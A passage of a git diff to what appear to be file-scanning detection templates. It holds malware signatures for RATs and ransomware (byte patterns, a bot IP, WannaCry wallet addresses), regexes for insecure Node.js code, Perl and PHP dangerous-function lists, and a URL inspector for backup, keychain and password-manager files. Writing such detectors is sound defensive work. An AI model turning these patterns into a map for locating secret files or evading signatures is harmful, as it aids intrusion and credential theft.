b/file/malware/qrat-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all diff --git a/file/malware/satana-dropper-malware.yaml b/file/malware/satana-dropper-malware.yaml index c82a39dc6c..e2c025b530 100644 --- a/file/malware/satana-dropper-malware.yaml +++ b/file/malware/satana-dropper-malware.yaml @@ -6,15 +6,13 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Satana.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - "25732D547279457863657074" - "643A5C6C626574776D77795C75696A657571706C667775622E706462" - "71666E7476746862" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/satana-malware.yaml b/file/malware/satana-malware.yaml index 01e87bbeec..30ab26288e 100644 --- a/file/malware/satana-malware.yaml +++ b/file/malware/satana-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar tags: malware,file - file: - extensions: - all @@ -25,4 +24,4 @@ file: binary: - "7467777975677771" - "537776776E6775" - condition: or \ No newline at end of file + condition: or diff --git a/file/malware/shimrat-malware.yaml b/file/malware/shimrat-malware.yaml index 3a75f5be23..a323e274d2 100644 --- a/file/malware/shimrat-malware.yaml +++ b/file/malware/shimrat-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar tags: malware,file - file: - extensions: - all @@ -39,4 +38,4 @@ file: - "ShimMain" - "NotifyShims" - "GetHookAPIs" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/shimratreporter-malware.yaml b/file/malware/shimratreporter-malware.yaml index 98d2b9a06c..0e828321b6 100644 --- a/file/malware/shimratreporter-malware.yaml +++ b/file/malware/shimratreporter-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/sigma-malware.yaml b/file/malware/sigma-malware.yaml index 70eca55e9b..9c07402302 100644 --- a/file/malware/sigma-malware.yaml +++ b/file/malware/sigma-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Sigma.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -24,4 +22,4 @@ file: - "&country=" - "&network=" - "&subid=" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/smallnet-malware.yaml b/file/malware/smallnet-malware.yaml index 80cf24245b..1238b553bd 100644 --- a/file/malware/smallnet-malware.yaml +++ b/file/malware/smallnet-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -25,4 +23,4 @@ file: - "stub_2.Properties" - "stub.exe" - "get_CurrentDomain" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/snake-malware.yaml b/file/malware/snake-malware.yaml index 5940273e81..db5435c0db 100644 --- a/file/malware/snake-malware.yaml +++ b/file/malware/snake-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Snake.yar tags: malware,file - file: - extensions: - all @@ -22,4 +21,4 @@ file: binary: - "89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF" - "648B0D140000008B89000000003B61080F863801000083EC3CE8321AF3FF8D7C242889E6E825EAF0FF8B44242C8B4C242889C2C1E81FC1E01F85C00F84FC000000D1E289CBC1E91F09D189DAD1E3C1EB1F89CDD1E109D989CB81C1807FB1D7C1ED1F81C3807FB1D783D50D89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF31C0EB79894424208B4C24408D14C18B1A895C24248B52048954241CC7042405000000E848FEFFFF8B4424088B4C2404C70424000000008B542424895424048B5C241C895C2408894C240C89442410E8ECDDEFFF8B4424188B4C2414894C24088944240C8B4424248904248B44241C89442404E868BBF3FF8B44242040" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/sub7nation-malware.yaml b/file/malware/sub7nation-malware.yaml index 9336dd7bbe..4be03dda86 100644 --- a/file/malware/sub7nation-malware.yaml +++ b/file/malware/sub7nation-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/t5000-malware.yaml b/file/malware/t5000-malware.yaml index a3fc68f0e0..bedf20c7c4 100644 --- a/file/malware/t5000-malware.yaml +++ b/file/malware/t5000-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_T5000.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -29,4 +27,4 @@ file: - "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb" - "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb" - "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb" - condition: or \ No newline at end of file + condition: or diff --git a/file/malware/tedroo-malware.yaml b/file/malware/tedroo-malware.yaml index 0ca935a0c8..1fe20c173d 100644 --- a/file/malware/tedroo-malware.yaml +++ b/file/malware/tedroo-malware.yaml @@ -6,14 +6,12 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Tedroo.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - "257325732E657865" - "5F6C6F672E747874" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/terminator-malware.yaml b/file/malware/terminator-malware.yaml index 82645aa4c9..500144ae6d 100644 --- a/file/malware/terminator-malware.yaml +++ b/file/malware/terminator-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Terminator.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/teslacrypt-malware.yaml b/file/malware/teslacrypt-malware.yaml index b89352ca1a..59a3cfbb40 100644 --- a/file/malware/teslacrypt-malware.yaml +++ b/file/malware/teslacrypt-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_TeslaCrypt.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: diff --git a/file/malware/tox-malware.yaml b/file/malware/tox-malware.yaml index fb71d2c6d2..c473f7336f 100644 --- a/file/malware/tox-malware.yaml +++ b/file/malware/tox-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Tox.yar tags: malware,file - file: - extensions: - all @@ -32,4 +31,4 @@ file: words: - "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/treasurehunt-malware.yaml b/file/malware/treasurehunt-malware.yaml index c47c1fa499..26468a34eb 100644 --- a/file/malware/treasurehunt-malware.yaml +++ b/file/malware/treasurehunt-malware.yaml @@ -8,11 +8,9 @@ info: - http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TreasureHunt.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -20,4 +18,4 @@ file: - "treasureHunter.pdb" - "jucheck" - "cmdLineDecrypted" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/trickbot-malware.yaml b/file/malware/trickbot-malware.yaml index 8952cddcb8..3bb52aa8ef 100644 --- a/file/malware/trickbot-malware.yaml +++ b/file/malware/trickbot-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TrickBot.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -20,4 +18,4 @@ file: - "Control" - "FreeBuffer" - "Release" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/trumpbot-malware.yaml b/file/malware/trumpbot-malware.yaml index d940cf10c1..a0b1d68941 100644 --- a/file/malware/trumpbot-malware.yaml +++ b/file/malware/trumpbot-malware.yaml @@ -6,15 +6,13 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Trumpbot.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw words: - "trumpisdaddy" - "198.50.154.188" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/universal-1337-malware.yaml b/file/malware/universal-1337-malware.yaml index 939e130630..fe8b9615d7 100644 --- a/file/malware/universal-1337-malware.yaml +++ b/file/malware/universal-1337-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Stealer.yar tags: malware,file - file: - extensions: - all @@ -23,4 +22,4 @@ file: binary: - "4654507E" - "7E317E317E307E30" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/unrecom-malware.yaml b/file/malware/unrecom-malware.yaml index 5a5ea9b335..f65ad29ed7 100644 --- a/file/malware/unrecom-malware.yaml +++ b/file/malware/unrecom-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/urausy-malware.yaml b/file/malware/urausy-malware.yaml index a412bb4f7b..72fa6bcde7 100644 --- a/file/malware/urausy-malware.yaml +++ b/file/malware/urausy-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Urausy.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,4 @@ file: - "YIWEFHIWQ" - "CreateDesktop" - "MyDesktop" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/vertex-malware.yaml b/file/malware/vertex-malware.yaml index b4e68411c8..8453a82da5 100644 --- a/file/malware/vertex-malware.yaml +++ b/file/malware/vertex-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/virusrat-malware.yaml b/file/malware/virusrat-malware.yaml index 2cdabae5cd..e8ab8fa458 100644 --- a/file/malware/virusrat-malware.yaml +++ b/file/malware/virusrat-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/wabot-malware.yaml b/file/malware/wabot-malware.yaml index cabadc8dae..5fdb092e02 100644 --- a/file/malware/wabot-malware.yaml +++ b/file/malware/wabot-malware.yaml @@ -6,14 +6,12 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Wabot.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - "433A5C6D6172696A75616E612E747874" - "7349524334" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/wannacry-malware.yaml b/file/malware/wannacry-malware.yaml index 10b7f5bd21..40488659bb 100644 --- a/file/malware/wannacry-malware.yaml +++ b/file/malware/wannacry-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_wannacry.yara tags: malware,file,wannacry - file: - extensions: - all @@ -29,4 +28,4 @@ file: - "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" - "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" - "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" - condition: or \ No newline at end of file + condition: or diff --git a/file/malware/warp-malware.yaml b/file/malware/warp-malware.yaml index 2dd06313d1..d5bf5d755a 100644 --- a/file/malware/warp-malware.yaml +++ b/file/malware/warp-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Warp.yar tags: malware,file - file: - extensions: - all @@ -23,4 +22,4 @@ file: - type: binary binary: - - "80382B7503C6002D80382F7503C6005F" \ No newline at end of file + - "80382B7503C6002D80382F7503C6005F" diff --git a/file/malware/xhide-malware.yaml b/file/malware/xhide-malware.yaml index daba5648b1..69c3ca5fd7 100644 --- a/file/malware/xhide-malware.yaml +++ b/file/malware/xhide-malware.yaml @@ -6,15 +6,13 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XHide.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw words: - 'XHide - Process Faker' - 'Fakename: %s PidNum: %d' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/xor-ddos-malware.yaml b/file/malware/xor-ddos-malware.yaml index 5a0f709812..668ce54532 100644 --- a/file/malware/xor-ddos-malware.yaml +++ b/file/malware/xor-ddos-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XOR_DDos.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -22,4 +20,4 @@ file: - "rmfile=" - "exec_packet" - "build_iphdr" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/yayih-malware.yaml b/file/malware/yayih-malware.yaml index 7528720747..b8f249497e 100644 --- a/file/malware/yayih-malware.yaml +++ b/file/malware/yayih-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Yayih.yar tags: malware,file - file: - extensions: - all @@ -24,4 +23,4 @@ file: - type: binary binary: - - "8004087A03C18B45FC8034081903C1413B0A7CE9" \ No newline at end of file + - "8004087A03C18B45FC8034081903C1413B0A7CE9" diff --git a/file/malware/zeghost-malware.yaml b/file/malware/zeghost-malware.yaml index e5ab80c5f5..986513be43 100644 --- a/file/malware/zeghost-malware.yaml +++ b/file/malware/zeghost-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Zegost.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: diff --git a/file/malware/zoxpng-malware.yaml b/file/malware/zoxpng-malware.yaml index caac47273a..140669c99b 100644 --- a/file/malware/zoxpng-malware.yaml +++ b/file/malware/zoxpng-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_ZoxPNG.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/zrypt-malware.yaml b/file/malware/zrypt-malware.yaml index eabad8f710..038d17f608 100644 --- a/file/malware/zrypt-malware.yaml +++ b/file/malware/zrypt-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara tags: malware,file,zrypt - file: - extensions: - all @@ -31,4 +30,4 @@ file: - ".pef" - ".pem" - "How to decrypt files.html" - condition: and \ No newline at end of file + condition: and diff --git a/file/nodejs/admzip-path-overwrite.yaml b/file/nodejs/admzip-path-overwrite.yaml index dbf7ea5442..b15ba6a790 100644 --- a/file/nodejs/admzip-path-overwrite.yaml +++ b/file/nodejs/admzip-path-overwrite.yaml @@ -6,11 +6,9 @@ info: severity: info description: Insecure ZIP archive extraction using adm-zip can result in arbitrary path over write and can result in code injection. tags: file,nodejs,admzip - file: - extensions: - all - matchers: - type: regex regex: diff --git a/file/nodejs/express-lfr.yaml b/file/nodejs/express-lfr.yaml index 6f1f0e5b4e..79aa4a30ea 100644 --- a/file/nodejs/express-lfr.yaml +++ b/file/nodejs/express-lfr.yaml @@ -6,11 +6,9 @@ info: severity: info description: Untrusted user input in express render() function can result in arbitrary file read if hbs templating is used. tags: file,nodejs,express,lfr - file: - extensions: - all - matchers: - type: regex regex: diff --git a/file/nodejs/generic-path-traversal.yaml b/file/nodejs/generic-path-traversal.yaml index 8b06ffa1cd..b80f29213f 100644 --- a/file/nodejs/generic-path-traversal.yaml +++ b/file/nodejs/generic-path-traversal.yaml @@ -6,11 +6,9 @@ info: severity: info description: Untrusted user input in readFile()/readFileSync() can endup in Directory Traversal Attacks. tags: file,nodejs - file: - extensions: - all - matchers: - type: regex regex: @@ -18,4 +16,4 @@ file: - "[^\\.]*\\.readFile\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" - "[^\\.]*\\.readFileSync\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" - "[^\\.]*\\.readFileAsync\\([^\\)]*\\, <[\\s\\S]*?\\> [^\\)]*\\)" - condition: or \ No newline at end of file + condition: or diff --git a/file/nodejs/tar-path-overwrite.yaml b/file/nodejs/tar-path-overwrite.yaml index 22dc649a1f..d11ebc5578 100644 --- a/file/nodejs/tar-path-overwrite.yaml +++ b/file/nodejs/tar-path-overwrite.yaml @@ -6,11 +6,9 @@ info: severity: info description: Insecure TAR archive extraction can result in arbitrary path over write and can result in code injection. tags: file,nodejs - file: - extensions: - all - matchers: - type: regex regex: @@ -18,4 +16,4 @@ file: - "[\\w\\W]+?\\.createWriteStream\\([\\w\\W]*?\\, [\\w\\W]*?\\)" - "[\\w\\W]+?\\.writeFile\\([\\w\\W]*?\\, [\\w\\W]*?\\)" - "[\\w\\W]+?\\.writeFileSync\\([\\w\\W]*?\\, [\\w\\W]*?\\)" - condition: or \ No newline at end of file + condition: or diff --git a/file/nodejs/xss-disable-mustache-escape.yaml b/file/nodejs/xss-disable-mustache-escape.yaml index 8d8918dbb8..40fb072655 100644 --- a/file/nodejs/xss-disable-mustache-escape.yaml +++ b/file/nodejs/xss-disable-mustache-escape.yaml @@ -6,11 +6,9 @@ info: severity: info description: Markup escaping disabled. This can be used with some template engines to escape disabling of HTML entities, which can lead to XSS attacks. tags: file,nodejs,mustache,xss - file: - extensions: - all - matchers: - type: regex regex: diff --git a/file/nodejs/xss-serialize-javascript.yaml b/file/nodejs/xss-serialize-javascript.yaml index 011b11c797..e2cf37ff31 100644 --- a/file/nodejs/xss-serialize-javascript.yaml +++ b/file/nodejs/xss-serialize-javascript.yaml @@ -6,11 +6,9 @@ info: severity: info description: Untrusted user input reaching `serialize-javascript` with `unsafe` attribute can cause Cross Site Scripting (XSS). tags: file,nodejs,serialize,xss - file: - extensions: - all - matchers: - type: regex regex: diff --git a/file/nodejs/zip-path-overwrite.yaml b/file/nodejs/zip-path-overwrite.yaml index 6feb0c66d4..c352c39992 100644 --- a/file/nodejs/zip-path-overwrite.yaml +++ b/file/nodejs/zip-path-overwrite.yaml @@ -6,11 +6,9 @@ info: severity: info description: Insecure ZIP archive extraction can result in arbitrary path overwrite and can result in code injection. tags: file,nodejs - file: - extensions: - all - matchers: - type: regex regex: diff --git a/file/perl/perl-scanner.yaml b/file/perl/perl-scanner.yaml index 0f9d282237..ddbd3be12b 100644 --- a/file/perl/perl-scanner.yaml +++ b/file/perl/perl-scanner.yaml @@ -5,14 +5,13 @@ info: author: geeknik severity: info tags: perl,file - file: - extensions: - - pl # default - - perl # uncommon - - pod # plain old documentation - - pm # perl module - - cgi # common gateway interface + - pl # default + - perl # uncommon + - pod # plain old documentation + - pm # perl module + - cgi # common gateway interface extractors: - type: regex @@ -20,48 +19,59 @@ file: regex: - 'srand' - 'rand' + - type: regex regex: - 'getc' - 'readdir' - 'read' - 'sysread' + - type: regex # When using exec, it is important to be sure that the string being used does not contain relative paths elements (../ for example), or a null, which may cause underlying C calls to behave strangely. regex: - 'exec' + - type: regex # The filehandle argument should not be derived from user input. Doing so could allow arbitrary filehandles to have operations carried out on them. regex: - 'fcntl' + - type: regex # The second argument specifying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to be bound to an address of their choice. regex: - 'bind' + - type: regex # When using setpgrp, neither argument should be derived from user input, doing so may allow the attacker to modify both the PID and the PGRP argument, possibly allowing arbitrary processes to have their process group changed. regex: - 'setpgrp' + - type: regex # When using setpriority, do not pass arguments to it that are derived from user input. Doing so could allow an attacker to set the priority of an arbitrary process on the system. regex: - 'setpriority' + - type: regex # Care should be exercised when using the syscall function. Arguments derived from user input are to be avoided, and are especially dangerous due to the fact they are passed directly to the underlying OS call. There is also a potential for buffer-overflow like problems with strings that may be written to. Extend all perl strings to sane lengths before passing them into this function. regex: - 'syscall' + - type: regex # The second argument specifying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to connect to an arbitrary remote address, enabling hijacking of potentially sensitive network data. regex: - 'connect' + - type: regex # When using system, it is important to be sure that the string being used does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave strangely. It is also imperative to insure the string has no characters that may be interpreted by the shell, possibly allowing arbitrary commands to be run. regex: - 'system' + - type: regex # The filename argument of open should be carefully checked if it is being created with any user-supplied string as a component of it. Strings should be checked for occurrences of path backtracking/relative path components (../ as an example), or nulls, which may cause the underlying C call to interpret the filename to open differently than expected. It is also important to make sure that the final filename does not end in a "|", as this will cause the path to be executed. regex: - 'open' + - type: regex # When using this function, it is important to be sure that the string being passed in does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave in ways you do not expect. This is especially important if the string is in any way constructed from a user supplied value. regex: @@ -74,30 +84,37 @@ file: - 'symlink' - 'truncate' - 'chroot' + - type: regex # Using a user supplied expression as an argument to this function should be avoided. Explicitly set the umask to a value you know is safe. regex: - 'umask' + - type: regex # Avoid constructing the list of process ids to kill with any strings that contain user inputted data. Users may be able to manipulate the pid values in such a way as to cause arbitrary signals to be sent to processes, possibly leading to exploits or DoS attacks. regex: - 'kill' + - type: regex # Using user supplied strings as the arguments to ioctl may allow the user to manipulate the device in arbitrary ways. regex: - 'ioctl' + - type: regex # Using user supplied strings anywhere inside of an eval is extremely dangerous. Unvalidated user input fed into an eval call may allow the user to execute arbitrary perl code. Avoid ever passing user supplied strings into eval. regex: - 'eval' + - type: regex # Glob invokes a shell (usually /bin/csh) to obtain the list of filenames that match the glob pattern. Unvalidated user input used in a glob pattern could allow arbitrary shell code to be run, possibly executing programs as a result. Avoid using user input in glob patterns. regex: - 'glob' + - type: regex # Remember that sensitive data get copied on fork. For example, a random number generator's internal state will get duplicated, and the child may start outputting identical number streams. regex: - 'fork' + - type: regex # DNS results can easily be forged by an attacker (or arbitrarily set to large values, etc), and should not be trusted. regex: diff --git a/file/php/php-scanner.yaml b/file/php/php-scanner.yaml index d2bb1f4865..1c5128a625 100644 --- a/file/php/php-scanner.yaml +++ b/file/php/php-scanner.yaml @@ -5,7 +5,6 @@ info: author: geeknik severity: info tags: php,file - file: - extensions: - html @@ -30,36 +29,44 @@ file: # Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array('$user_id')); regex: - '(?i)getone|getrow|getall|getcol|getassoc|execute|replace' + - type: regex # Warn when var_dump is found regex: - 'var_dump' + - type: regex # Warn when display_errors is enabled manually regex: - 'display_errors' + - type: regex # Avoid the use of eval() regex: - 'eval' - 'eval\((base64|eval|\$_|\$\$|\$[A-Za-z_0-9\{]*(\(|\{|\[))' + - type: regex # Avoid the use of exit or die() regex: - 'exit' - 'die' + - type: regex # Avoid the use of logical operators (ex. using and over &&) regex: - 'and' + - type: regex # Avoid the use of the ereg* functions (now deprecated) regex: - 'ereg' + - type: regex # Ensure that the second parameter of extract is set to not overwrite (not EXTR_OVERWRITE) regex: - 'extract' + - type: regex # Checking output methods (echo, print, printf, print_r, vprintf, sprintf) that use variables in their options regex: @@ -69,73 +76,91 @@ file: - 'print_r' - 'vprintf' - 'sprintf' + - type: regex # Ensuring you're not using echo with file_get_contents regex: - 'file_get_contents' + - type: regex # Testing for the system execution functions and shell exec (backticks) regex: - '\\`' + - type: regex # Use of readfile, readlink and readgzfile regex: - 'readfile' - 'readlink' - 'readgzfile' + - type: regex # Using parse_str or mb_parse_str (writes values to the local scope) regex: - 'parse_st' - 'mb_parse_str' + - type: regex # Using session_regenerate_id either without a parameter or using false regex: - 'session_regenerate' + - type: regex # Avoid use of $_REQUEST (know where your data is coming from) regex: - '\\$_REQUEST' + - type: regex # Don't use mysql_real_escape_string regex: - 'mysql_real_escape_string' + - type: regex # Avoiding use of import_request_variables regex: - 'import_request_variables' + - type: regex # Avoid use of GLOBALS regex: - 'GLOBALS' + - type: regex regex: - '_GET' + - type: regex regex: - '_POST' + - type: regex regex: - '_COOKIE' + - type: regex regex: - '_SESSION' + - type: regex # Ensure the use of type checking validating against booleans (===) regex: - '\\=\\=\\=' + - type: regex # Ensure that the /e modifier isn't used in regular expressions (execute) regex: - '\\/e' + - type: regex # Using concatenation in header() calls regex: - 'header' + - type: regex # Avoiding the use of $http_raw_post_data regex: - '\\$http_raw_post_data' + - type: regex # interesting functions for POP/Unserialize regex: @@ -149,110 +174,137 @@ file: - "__set" - "__isset" - "__unset" + - type: regex # phpinfo detected regex: - "phpinfo" + - type: regex # registerPHPFunctions() allows code exec in XML regex: - "registerPHPFunctions" + - type: regex regex: - "session_start" + - type: regex # dBase DBMS regex: - "dbase_open" + - type: regex # DB++ DBMS regex: - "dbplus_open" - "dbplus_ropen" + - type: regex # Frontbase DBMS regex: - "fbsql_connect" + - type: regex # Informix DBMS regex: - "ifx_connect" + - type: regex # IBM DB2 DBMS regex: - "db2_(p?)connect" + - type: regex # FTP server regex: - "ftp_(ssl_)?connect" + - type: regex # Ingres DBMS regex: - "ingres_(p?)connect" + - type: regex # LDAP server regex: - "ldap_connect" + - type: regex # msession server regex: - "msession_connect" + - type: regex # mSQL DBMS regex: - "msql_(p?)connect" + - type: regex # MsSQL DBMS regex: - "mssql_(p?)connect" + - type: regex # MySQL DBMS regex: - "mysql_(p?)connect" + - type: regex # MySQLi Extension regex: - "mysqli((_real)?_connect)?|_query" + - type: regex # Oracle OCI8 DBMS regex: - "oci|(_new?)|_connect|(n?|p?)logon" + - type: regex # Oracle DBMS regex: - "ora_(p?)connect" + - type: regex # Ovrimos SQL DBMS regex: - "ovrimos_connect" + - type: regex # PostgreSQL DBMS regex: - "pg_(p?)connect" + - type: regex # SQLite DBMS regex: - "sqlite_(p?)open" + - type: regex # SQLite3 DBMS regex: - "SQLite3" + - type: regex # Sybase DBMS regex: - "sybase_(p?)connect" + - type: regex # TokyoTyrant DBMS regex: - "TokyoTyrant" + - type: regex # XML document regex: - "x(ptr|path)_new_context" + - type: regex # Investigate if GetTableFields is called safely regex: - "GetTableFields" + - type: regex regex: - "ini_get.*magic_quotes_gpc.*" diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index dde6071e7f..730b9dec46 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -9,7 +9,6 @@ info: - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html tags: python,file,sast - file: - extensions: - py diff --git a/file/url-analyse/url-extension-inspector.yaml b/file/url-analyse/url-extension-inspector.yaml index fbef5f01da..1511594c45 100644 --- a/file/url-analyse/url-extension-inspector.yaml +++ b/file/url-analyse/url-extension-inspector.yaml @@ -1,4 +1,5 @@ id: url-extension-inspector + info: name: URL Extension Inspector author: ayadim @@ -8,211 +9,261 @@ info: reference: - https://github.com/CYS4srl/CYS4-SensitiveDiscoverer/ tags: file,urls,extension - file: - extensions: - all + extractors: - type: regex name: Hot finding regex: - "(?i)(htdocs|www|html|web|webapps|public|public_html|uploads|website|api|test|app|backup|bin|bak|old|release|sql)\\.(7z|bz2|gz|lz|rar|tar\\.gz|tar\\.bz2|xz|zip|z)" + - type: regex name: Backup file regex: - "(?i)(\\.bak|\\.backup|\\.bkp|\\._bkp|\\.bk|\\.BAK)" + - type: regex name: PHP Source regex: - "(?i)(\\.php)(\\.~|\\.bk|\\.bak|\\.bkp|\\.BAK|\\.swp|\\.swo|\\.swn|\\.tmp|\\.save|\\.old|\\.new|\\.orig|\\.dist|\\.txt|\\.disabled|\\.original|\\.backup|\\._back|\\._1\\.bak|~|!|\\.0|\\.1|\\.2|\\.3)" + - type: regex name: ASP Source regex: - "(?i)(\\.asp)(\\.~|\\.bk|\\.bak|\\.bkp|\\.BAK|\\.swp|\\.swo|\\.swn|\\.tmp|\\.save|\\.old|\\.new|\\.orig|\\.dist|\\.txt|\\.disabled|\\.original|\\.backup|\\._back|\\._1\\.bak|~|!|\\.0|\\.1|\\.2|\\.3)" + - type: regex name: Database file regex: - "(?i)\\.db|\\.sql" + - type: regex name: Bash script regex: - "(?i)\\.sh|\\.bashrc|\\.zshrc" + - type: regex name: 1Password password manager database file regex: - "(?i)\\.agilekeychain" + - type: regex name: ASP configuration file regex: - "(?i)\\.asa" + - type: regex name: Apple Keychain database file regex: - "(?i)\\.keychain" + - type: regex name: Azure service configuration schema file regex: - "(?i)\\.cscfg" + - type: regex name: Compressed archive file regex: - "(?i)(\\.zip|\\.gz|\\.tar|\\.rar|\\.tgz)" + - type: regex name: Configuration file regex: - "(?i)(\\.ini|\\.config|\\.conf)" + - type: regex name: Day One journal file regex: - "(?i)\\.dayone" + - type: regex name: Document file regex: - "(?i)(\\.doc|\\.docx|\\.rtf)" + - type: regex name: GnuCash database file regex: - "(?i)\\.gnucash" + - type: regex 